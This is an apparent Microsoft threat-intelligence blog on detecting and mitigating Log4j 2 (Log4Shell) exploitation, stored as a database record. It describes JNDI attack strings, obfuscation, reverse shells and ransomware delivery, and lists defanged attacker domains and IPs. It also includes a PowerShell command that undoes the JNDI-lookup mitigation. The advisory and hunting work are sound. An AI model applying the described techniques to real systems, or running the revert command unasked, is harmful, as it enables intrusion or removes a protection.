DATABASE RESOURCES PRICING ABOUT US

{"id": "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "vendorId": null, "type": "mmpc", "bulletinFamily": "blog", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** &gt; **Dashboard** &gt; **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it&#x27;s Microsoft Defender for Endpoint&#x27;s [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It&#x27;s a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it&#x27;s possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>)- detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltSrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), 